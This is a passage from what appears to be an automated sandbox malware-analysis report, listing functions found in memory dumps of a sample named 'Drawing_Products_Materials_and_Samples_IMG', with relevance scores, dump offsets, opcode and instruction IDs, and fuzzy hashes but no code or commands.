                                                                                      • Opcode Fuzzy Hash: d3b428ada45d7cc0869fee1d58cf070edcab9cf6e17e35888bf6378da228131c
                                                                                      • Instruction Fuzzy Hash: 9A416B71E016188BEB58CF57D9447DEFAF3AFC9304F14C1A9C50CA6254EB740A858F51
                                                                                      Function 373D36B8 Relevance: .1, Instructions: 111COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150954301.00000000373D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_373d0000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c90405206fde2cdbc8c45d43f14329f9782e3ee7091ebb82741229e2673a7056
                                                                                      • Instruction ID: 3803b68e1303de8db5637b59d60f5e54c545f831bfcb7cfc71e15dc4aa516618
                                                                                      • Opcode Fuzzy Hash: c90405206fde2cdbc8c45d43f14329f9782e3ee7091ebb82741229e2673a7056
                                                                                      • Instruction Fuzzy Hash: D941E6B5E01608CBEB18DFAAD9406DEFBF2AF89300F20D12AC418BB254DB355946CF55
                                                                                      Function 37401CDF Relevance: .1, Instructions: 106COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151145187.0000000037400000.00000040.00000800.00020000.00000000.sdmp, Offset: 37400000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 26fa0efe3fec7baeee8cdc0892d8bf36e272b207ecc221789dc8a69496c6187d
                                                                                      • Instruction ID: 2168003583b8b1d0f6ed7b5e2dbfe0c2aadc6beaefce1b25835b7946cade9579
                                                                                      • Opcode Fuzzy Hash: 26fa0efe3fec7baeee8cdc0892d8bf36e272b207ecc221789dc8a69496c6187d
                                                                                      • Instruction Fuzzy Hash: CE41D074D012188BEB18DFAAD9546DEFBF2BF89300F20D17AD418AB254EB345946CF50
                                                                                      Function 36A92571 Relevance: .1, Instructions: 104COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d41a946a84d5a547531b7531cc630864c2c5ee85c4c941430adc426e37bd0bb6
                                                                                      • Instruction ID: ae2fe94b682b3ed50107230763e7f22c9b466bac1661fec4d2fecaf4f888ab0a
                                                                                      • Opcode Fuzzy Hash: d41a946a84d5a547531b7531cc630864c2c5ee85c4c941430adc426e37bd0bb6
                                                                                      • Instruction Fuzzy Hash: 1241C274E01648CBEB58DFAAC5546DEBBF2BF89300F20D12AD818AB258DB354946CF44
                                                                                      Function 37408460 Relevance: .1, Instructions: 103COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151145187.0000000037400000.00000040.00000800.00020000.00000000.sdmp, Offset: 37400000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ba8ff4c71a938ba0f3b3c4a28ce52013fdcafd0ec6d965e3a346aa99fe87b646
                                                                                      • Instruction ID: a82c429928f560db292b06ad5c6eeab4f04470511c011ada8f6841ab1df4f131
                                                                                      • Opcode Fuzzy Hash: ba8ff4c71a938ba0f3b3c4a28ce52013fdcafd0ec6d965e3a346aa99fe87b646
                                                                                      • Instruction Fuzzy Hash: 0931E374E012088BEB08DFAAD9406DEFBF6AF89300F20D13AC818BB254DB345942CF54
                                                                                      Function 373693B0 Relevance: .1, Instructions: 102COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 52c800d5f57dde7c01be7d23a84eb6c7f1ffeb5f0e56385949a77e19324ac5e4
                                                                                      • Instruction ID: 6f0ebbf00168c7ee0659096d7d6cd4ac47f134a207c379acdbe72010e8d1349e
                                                                                      • Opcode Fuzzy Hash: 52c800d5f57dde7c01be7d23a84eb6c7f1ffeb5f0e56385949a77e19324ac5e4
                                                                                      • Instruction Fuzzy Hash: 0841C974D016488BEB18CFAAD9546DEFBF2BF89304F20D02AC418BB259DB345946CF54
                                                                                      Function 3740FB28 Relevance: .1, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151145187.0000000037400000.00000040.00000800.00020000.00000000.sdmp, Offset: 37400000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 388bcd2bf1a2b880f4ddc502a80c3d07fcf8a9bcd63a40a41059dadc3e5bb541
                                                                                      • Instruction ID: 4cef3c50c2df8183525004a8d532432d0941467776e6d431d0e49c8effc3b266
                                                                                      • Opcode Fuzzy Hash: 388bcd2bf1a2b880f4ddc502a80c3d07fcf8a9bcd63a40a41059dadc3e5bb541
                                                                                      • Instruction Fuzzy Hash: DC31B274E01648CBEB44DFAAD8506EDFBF2BB89300F20D13AC819AB255DB345942CF55
                                                                                      Function 373622EF Relevance: .1, Instructions: 100COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 28be90d7a9d5e6e56dff19848962ea21c0cc4315c5be7bc9ca5c4fb9e39aa5a9
                                                                                      • Instruction ID: d5fa2105d3df643f969aca59ff2e2f601eb62e5177ea25dfab5b7db3ed721e57
                                                                                      • Opcode Fuzzy Hash: 28be90d7a9d5e6e56dff19848962ea21c0cc4315c5be7bc9ca5c4fb9e39aa5a9
                                                                                      • Instruction Fuzzy Hash: 3641E5B4D056088FEB18DFAAD9446DDBBF2AF89304F20C12AC418BB259DB345946CF54
                                                                                      Function 37417A18 Relevance: .1, Instructions: 97COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6fba1708807d2f6734bbfb8d0a77f37a1f88893f31b0673543fcc0482ef6380c
                                                                                      • Instruction ID: 022c4b7ebcfc84f480c5133039263e04f7cf7691a113dcba7b25f6b502a4ce54
                                                                                      • Opcode Fuzzy Hash: 6fba1708807d2f6734bbfb8d0a77f37a1f88893f31b0673543fcc0482ef6380c
                                                                                      • Instruction Fuzzy Hash: C5310974E05208CBEB14DFAADA546DEBBF2AF89300F24D02AC418BB354DB356942CF55
                                                                                      Function 374176F8 Relevance: .1, Instructions: 97COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fbdce20a5bff4b3dbe9822f31904f0c4c7f38f74ea6b326a0f957f3e5ffa2434
                                                                                      • Instruction ID: 5ae744c78a8ac9a4893be1ce6dee283bdc775e5297cc145c0e741964c23285d6
                                                                                      • Opcode Fuzzy Hash: fbdce20a5bff4b3dbe9822f31904f0c4c7f38f74ea6b326a0f957f3e5ffa2434
                                                                                      • Instruction Fuzzy Hash: DC31E5B5E05248CBEB04DFAAD9506DEBBF2BF89300F24D02AC818BB255DB345946CF55
                                                                                      Function 00118828 Relevance: 16.9, Strings: 13, Instructions: 685COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: !]4$,!]4$8!]4$H ]4$P!]4$T ]4$\!]4$` ]4$h!]4$l ]4$t!]4$x ]4$ ]4
                                                                                      • API String ID: 0-2294103709
                                                                                      • Opcode ID: 2a2faa89dee40bfd4f9666e428439a917475081943b03fafc6c0c54742cc2799
                                                                                      • Instruction ID: f70bc805dde6e099bf343cd7f44cde677056f886bc752a90754cf35a6f28c73c
                                                                                      • Opcode Fuzzy Hash: 2a2faa89dee40bfd4f9666e428439a917475081943b03fafc6c0c54742cc2799
                                                                                      • Instruction Fuzzy Hash: 9C522034A012188FEB689BA4C860BDDBBB2FF89304F1081ADD01A6B795CF349D46DF55
                                                                                      Function 0011A533 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ,-]4$,-]4
                                                                                      • API String ID: 0-4257694735
                                                                                      • Opcode ID: b198f7cb7cd07911c90cba9fadbcaf7364f3e8745394fae7b66e22a4de2131b1
                                                                                      • Instruction ID: f5351a613b81f7ebe93800560b80b60160ebf5ff1b7f6869790774ee834d2cb5
                                                                                      • Opcode Fuzzy Hash: b198f7cb7cd07911c90cba9fadbcaf7364f3e8745394fae7b66e22a4de2131b1
                                                                                      • Instruction Fuzzy Hash: 8A516775E0125ADFCF09CFA4C8549DDBFB2FF89300F14812AE805AB254EB349995CB91
                                                                                      Function 36A94240 Relevance: 2.6, Strings: 2, Instructions: 60COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: }]4$}]4
                                                                                      • API String ID: 0-1177746836
                                                                                      • Opcode ID: 769c9cad59af50d238356fd77001285fce1a4b090c144aef35227a66a8b4a471
                                                                                      • Instruction ID: 191f6fff22de160a3384e76ffe5f8517714eebdbaec6b4c3849ad2a994d202e5
                                                                                      • Opcode Fuzzy Hash: 769c9cad59af50d238356fd77001285fce1a4b090c144aef35227a66a8b4a471
                                                                                      • Instruction Fuzzy Hash: 98119E397102048FD704DB6AD984E96B7E6FF89765F2081AAE54ACF360CA71EC00CB60
                                                                                      Function 36A93699 Relevance: 1.5, Strings: 1, Instructions: 220COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID: 0-3916222277
                                                                                      • Opcode ID: 8a86a98344a84d5a69c466550b026bffc0e9e29810ef6ae748a869889b77de59
                                                                                      • Instruction ID: c5dfeec0be172287da76569c3fcb451d1d848eadb9701d69a06e919416bad56d
                                                                                      • Opcode Fuzzy Hash: 8a86a98344a84d5a69c466550b026bffc0e9e29810ef6ae748a869889b77de59
                                                                                      • Instruction Fuzzy Hash: 1371E434B043449FEB059F78946529D36F2EFC6360F34822AE862DB3D1CE398D428796
                                                                                      Function 36A94390 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: p]4U
                                                                                      • API String ID: 0-2385810671
                                                                                      • Opcode ID: 3e37d70b628c9917eed603eadfd395c9d7f2641e09fd59a541c5f42a97bdeec5
                                                                                      • Instruction ID: 1eebb14da8cfa006c68d2e5a0cc0bd136e09cb9117a2c1aa366856c963504675
                                                                                      • Opcode Fuzzy Hash: 3e37d70b628c9917eed603eadfd395c9d7f2641e09fd59a541c5f42a97bdeec5
                                                                                      • Instruction Fuzzy Hash: A431B330B002089FDB09EBB9D955AAE7BF6EFC9200F1540BAE509DB351DE358D4287A1
                                                                                      Function 36A94230 Relevance: 1.3, Strings: 1, Instructions: 51COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: }]4
                                                                                      • API String ID: 0-1507274201
                                                                                      • Opcode ID: 13d5f980f3e7219b12ce489fd429b2070d6ef78c845d40052b50399f280d8297
                                                                                      • Instruction ID: d59bbc0c8104b1c20e150e964f76aa56fb048253a5e13bdd98592d3db1c96e4b
                                                                                      • Opcode Fuzzy Hash: 13d5f980f3e7219b12ce489fd429b2070d6ef78c845d40052b50399f280d8297
                                                                                      • Instruction Fuzzy Hash: BF11CE397143048FD7058B29C558A96BBE1FF8A764F2180AED445CF761CA70DC04CB20
                                                                                      Function 0011E263 Relevance: .7, Instructions: 652COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 43f4fdf835b65355f1cde83edcc40169a0b08b0076f23da012baa025c0ba9cc4
                                                                                      • Instruction ID: 3edb7e583f61ad47233e3db259bbf2d1bb3d7e0b5f2aecfc13a87456b43352d5
                                                                                      • Opcode Fuzzy Hash: 43f4fdf835b65355f1cde83edcc40169a0b08b0076f23da012baa025c0ba9cc4
                                                                                      • Instruction Fuzzy Hash: 73129274D22657AF93046FA4D6AC12EBB74FF2F323701AD20F05BE55659B35408ACE28
                                                                                      Function 0011E268 Relevance: .6, Instructions: 649COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b247da875de1d21e5cab1b55fd4a811eac6f374005d389701b194b37c28a206c
                                                                                      • Instruction ID: df11ded6e311aa1744fc3016b2e5b995708d2c61b4aa84662fd5d8484625d9ac
                                                                                      • Opcode Fuzzy Hash: b247da875de1d21e5cab1b55fd4a811eac6f374005d389701b194b37c28a206c
                                                                                      • Instruction Fuzzy Hash: 36129274D22657AF93046FA4D6AC12EBB74FF2F323701AD20F05BE55659B35408ACE28
                                                                                      Function 00111087 Relevance: .5, Instructions: 548COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 584acaf2b6d6578d0b59806a6608d9364aa48dcf942e417e47fbcb779b832acc
                                                                                      • Instruction ID: 98de075a7454a02bc39bf575dc6fab6fac3b78223c927395df27c5a597330e10
                                                                                      • Opcode Fuzzy Hash: 584acaf2b6d6578d0b59806a6608d9364aa48dcf942e417e47fbcb779b832acc
                                                                                      • Instruction Fuzzy Hash: E0522874A14219CFEB69DF64EC84A8DBBB2FB49701F1081A9D409A7354DF706E86CF90
                                                                                      Function 00111090 Relevance: .5, Instructions: 543COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ffd50f41624beeab4c2f5fd57a5b3ef616a743eda3cd3ba5bb387d68d04d3cd1
                                                                                      • Instruction ID: badc6c2fc7a59c317a95f470c200b877e061a82a0834da59c01f606ba4c9fccb
                                                                                      • Opcode Fuzzy Hash: ffd50f41624beeab4c2f5fd57a5b3ef616a743eda3cd3ba5bb387d68d04d3cd1
                                                                                      • Instruction Fuzzy Hash: 81521774A14219CFEB69DF64EC84A8DBBB2FB49701F1081A9D409A7354DF706E86CF90
                                                                                      Function 0011A979 Relevance: .4, Instructions: 362COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d6b09ab6ca033d65bfa25010072bbbfa7c73b79e8e9e43286a648e46956d9004
                                                                                      • Instruction ID: f63a100ee331a50ea32982da775a2770b3cc77a81d2abfa850a36e2111c44adf
                                                                                      • Opcode Fuzzy Hash: d6b09ab6ca033d65bfa25010072bbbfa7c73b79e8e9e43286a648e46956d9004
                                                                                      • Instruction Fuzzy Hash: CEF15D71A02509DFCF19CF98D584AAEBBB2FF88301F658565E405AB291D730ECC1CB96
                                                                                      Function 00117CB5 Relevance: .3, Instructions: 327COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 48707f55277ded1a9912096b718357d41a4a2b344ded871cbedc230b704b7259
                                                                                      • Instruction ID: e6f9a88b8d7c4c87c9349872519827ee4b7a76c9152ddd105f27aa791e51d190
                                                                                      • Opcode Fuzzy Hash: 48707f55277ded1a9912096b718357d41a4a2b344ded871cbedc230b704b7259
                                                                                      • Instruction Fuzzy Hash: 55D14C35A04209CFCB28DF69D984AEEBBF1BF48314F1585A9E4159B3A1DB30ED81CB50
                                                                                      Function 0011B483 Relevance: .3, Instructions: 301COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 37d0535d43309d26dbb857beb660ddbf8e3ecf15e07674642e15ef8e906ce180
                                                                                      • Instruction ID: e95910a6fc4cf6bd82e43673c84018b267287c1ae217136e2810dec9d91de344
                                                                                      • Opcode Fuzzy Hash: 37d0535d43309d26dbb857beb660ddbf8e3ecf15e07674642e15ef8e906ce180
                                                                                      • Instruction Fuzzy Hash: BCD1D771E042148FCB18CFA8D5849EDBBF6FF88714B1A80A9E515AB3A1C734EC81CB54
                                                                                      Function 001108DA Relevance: .3, Instructions: 259COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f5831030ff6055358b832474963a259e05aa0a12c9985a541b75c458304e8072
                                                                                      • Instruction ID: d486e74b31627e10f8d6f09341f26b62c97f83e1daa2e1b36c11bf2f42190b14
                                                                                      • Opcode Fuzzy Hash: f5831030ff6055358b832474963a259e05aa0a12c9985a541b75c458304e8072
                                                                                      • Instruction Fuzzy Hash: 31A13B34714600CFD759DB39C894A6977E2FF89B14B2581A8E50ACB3B6DB71EC81CB50
                                                                                      Function 37369C61 Relevance: .2, Instructions: 238COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 39bd7d6f8250390a2dc2ff7ff2a8b7687715ff0eed6242b3e206857ee7f3bcac
                                                                                      • Instruction ID: 59b44d926e96f543853ac7413b4629b23c2cbc52c7514483703065156630c4f7
                                                                                      • Opcode Fuzzy Hash: 39bd7d6f8250390a2dc2ff7ff2a8b7687715ff0eed6242b3e206857ee7f3bcac
                                                                                      • Instruction Fuzzy Hash: C2C1F174E002298FEB64DF68C994BDDBBB2BB88300F1081EAD50CA7294DB355E85DF51
                                                                                      Function 37369C70 Relevance: .2, Instructions: 234COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9bdefa6e1217e840d0ea1fa4ed1fd5384e7791f323c8fd4340fe3dfa2eab429a
                                                                                      • Instruction ID: 113a413ffce8903a8ecdacc6dd8123a0e7dfa6a5722c0b48d869607f1c0cee5c
                                                                                      • Opcode Fuzzy Hash: 9bdefa6e1217e840d0ea1fa4ed1fd5384e7791f323c8fd4340fe3dfa2eab429a
                                                                                      • Instruction Fuzzy Hash: B5B1F074E002298FEB64DF68C894BDDBBB2BB88300F1081EAD50CA7294DB755E85DF51
                                                                                      Function 36A94668 Relevance: .2, Instructions: 214COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 116e1c90e1f345ca9c2aa12994fb76f0a5228bf4c4dee7f7461ef8a7e6602289
                                                                                      • Instruction ID: 689bd0cde9d41f57df86006ffefe0650f3433b1cb8dcec0801e636fd1bc468e8
                                                                                      • Opcode Fuzzy Hash: 116e1c90e1f345ca9c2aa12994fb76f0a5228bf4c4dee7f7461ef8a7e6602289
                                                                                      • Instruction Fuzzy Hash: AD51F475A0430D9FD7148A69D840AAABBF5FBC6324F74853AE918DB700D7309801CBA0
                                                                                      Function 00116868 Relevance: .2, Instructions: 207COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d1222f109210913ed2afc6997d29ef639228ae0d536019983cfbcda5501cf8c2
                                                                                      • Instruction ID: 790f86e732aa73894ce33beb6ec4909534352939256091b14b9f980b1d35276e
                                                                                      • Opcode Fuzzy Hash: d1222f109210913ed2afc6997d29ef639228ae0d536019983cfbcda5501cf8c2
                                                                                      • Instruction Fuzzy Hash: 25713B34A00205CFDB1CCF69D894AEDB7B2BF89315B25807AD416AB365DB32EC81CB51
                                                                                      Function 00118470 Relevance: .2, Instructions: 201COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 55dd438937dcf57ae6f8d5804fcf43034d80e4d75a00bd4b907bad21417cef70
                                                                                      • Instruction ID: ad0b39a099ee70c9348a51251d40e56f7f9e638a013d12eafef65c6ca718714f
                                                                                      • Opcode Fuzzy Hash: 55dd438937dcf57ae6f8d5804fcf43034d80e4d75a00bd4b907bad21417cef70
                                                                                      • Instruction Fuzzy Hash: 66711B347006058FDB59DF28C894AAE7BE6EF59340B1980A9E805CB3B1EF75DC81CB91
                                                                                      Function 3741DD48 Relevance: .2, Instructions: 183COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 23dda4f1fd9234830420151c96e92cbf035a76bec776124ad72110d9539325f9
                                                                                      • Instruction ID: 1f9e40b323e26e223675f8b2ea2b306231b72968ced2df6e1897638fc1e23f12
